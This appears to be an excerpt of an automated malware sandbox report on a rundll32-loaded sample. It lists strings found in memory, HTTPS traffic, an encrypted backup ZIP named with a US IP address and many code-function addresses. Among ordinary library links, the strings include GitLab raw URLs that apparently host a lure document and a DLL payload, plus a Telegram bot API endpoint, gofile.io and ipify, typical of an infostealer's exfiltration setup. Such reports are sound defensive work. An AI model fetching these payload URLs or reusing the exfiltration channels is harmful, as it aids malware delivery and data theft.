            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/binaryformatter
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com
            Source: rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
            Source: rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityP%b
            Source: rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
            Source: rundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.gofile.io/serversP%b
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.gofile.io/serversY
            Source: rundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ipify.orgP%b
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ipify.orgY
            Source: rundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.telegram.org/botP%b
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.telegram.org/boti
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/dotnet/efcore
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/dotnet/linker/issues/2715.
            Source: rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/dotnet/runtime
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/50820
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/ericsink/SQLitePCL.raw
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1187
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1416.
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1731
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1895vUsing
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1906.
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1981
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/2025
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/pull/2125.
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/;
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false
            Source: rundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=falseP%b
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?in
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
            Source: rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://system.data.sqlite.org/
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://system.data.sqlite.org/X
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://urn.to/r/sds_see12https://urn.to/r/sds_see2
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://urn.to/r/sds_see23https://urn.to/r/sds_see1UInnerVerify
            Source: msedge.exe, 00000005.00000002.1765483938.000037E800110000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1773695210.00002D60000D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.newtonsoft.com/json
            Source: rundll32.exe, 0000000E.00000002.2594041980.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.sqlite.org/rescode.html
            Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
            Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
            Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
            Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
            Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
            Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
            Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.4:49948 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49966 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:50069 version: TLS 1.2

            System Summary

            barindex
            Source: Backup_[United States]_8.46.123.189_[1401].zip.14.drZip Entry: encrypted
            Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\system32\e_sqlite3.dllJump to behavior
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA04FE014_2_00007FFDFBA04FE0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9CDF4014_2_00007FFDFB9CDF40
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9C257014_2_00007FFDFB9C2570
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9AF5D014_2_00007FFDFB9AF5D0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB91451014_2_00007FFDFB914510
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB912BE014_2_00007FFDFB912BE0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB918BF014_2_00007FFDFB918BF0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9E7C2014_2_00007FFDFB9E7C20
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB948B6014_2_00007FFDFB948B60
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB94FBD014_2_00007FFDFB94FBD0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB91FBB014_2_00007FFDFB91FBB0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB91AAE614_2_00007FFDFB91AAE6
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB944B2014_2_00007FFDFB944B20
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB942A9014_2_00007FFDFB942A90
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9A0A6014_2_00007FFDFB9A0A60
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9A9AB014_2_00007FFDFB9A9AB0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB937A0014_2_00007FFDFB937A00
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9EFA1014_2_00007FFDFB9EFA10
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB987A3014_2_00007FFDFB987A30
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9C7A3014_2_00007FFDFB9C7A30
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB99898014_2_00007FFDFB998980
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9669D014_2_00007FFDFB9669D0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB94691214_2_00007FFDFB946912
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9BD94014_2_00007FFDFB9BD940
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB91B93014_2_00007FFDFB91B930
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB94A8A014_2_00007FFDFB94A8A0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9C58B014_2_00007FFDFB9C58B0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB92001014_2_00007FFDFB920010
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9E205014_2_00007FFDFB9E2050
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9B3F8814_2_00007FFDFB9B3F88
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9F8F8014_2_00007FFDFB9F8F80
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB972FD014_2_00007FFDFB972FD0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB965EE014_2_00007FFDFB965EE0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB948EF014_2_00007FFDFB948EF0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB98FEF014_2_00007FFDFB98FEF0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB98CF2014_2_00007FFDFB98CF20
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB93AE9014_2_00007FFDFB93AE90
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB95AEA014_2_00007FFDFB95AEA0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB93BE1014_2_00007FFDFB93BE10
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA46E3014_2_00007FFDFBA46E30
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB968E2014_2_00007FFDFB968E20
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9ACD8214_2_00007FFDFB9ACD82
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB983D7014_2_00007FFDFB983D70
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9ACDCA14_2_00007FFDFB9ACDCA
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA39DC014_2_00007FFDFBA39DC0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB96FDB014_2_00007FFDFB96FDB0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9ACD0F14_2_00007FFDFB9ACD0F
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB974CE014_2_00007FFDFB974CE0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9C4C9014_2_00007FFDFB9C4C90
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB93DCD014_2_00007FFDFB93DCD0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9EACD014_2_00007FFDFB9EACD0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9B7CB014_2_00007FFDFB9B7CB0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9E0CB014_2_00007FFDFB9E0CB0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB93C3E014_2_00007FFDFB93C3E0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB95E3E014_2_00007FFDFB95E3E0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9D83E014_2_00007FFDFB9D83E0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB95F44014_2_00007FFDFB95F440
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB94545014_2_00007FFDFB945450
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA1D44014_2_00007FFDFBA1D440
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA2B43014_2_00007FFDFBA2B430
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA5643014_2_00007FFDFBA56430
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB96D38014_2_00007FFDFB96D380
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB98C38014_2_00007FFDFB98C380
